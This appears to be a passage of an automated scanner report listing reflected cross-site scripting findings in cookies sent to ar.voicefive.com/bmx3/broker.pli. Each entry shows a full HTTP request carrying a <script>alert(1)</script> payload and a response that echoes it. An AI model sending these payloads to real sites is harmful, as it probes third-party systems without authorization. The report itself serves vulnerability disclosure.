P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '15b9d6<script>alert(1)</script>936b389d1ff', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 8bb0a<script>alert(1)</script>c3eff6b973a was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload c5b11<script>alert(1)</script>a7db032d736 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&rec
...[SNIP]...

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 77feb<script>alert(1)</script>412f9aebed7 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&
...[SNIP]...

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 6bb85<script>alert(1)</script>baaf6050393 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393', "BMX_3PC": '1', "BMX_G": 'method->
...[SNIP]...

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload afe4a<script>alert(1)</script>2a7bdbc50e5 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 62218<script>alert(1)</script>c76aa499034 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851"
...[SNIP]...

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload e561b<script>alert(1)</script>97681a38a8f was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
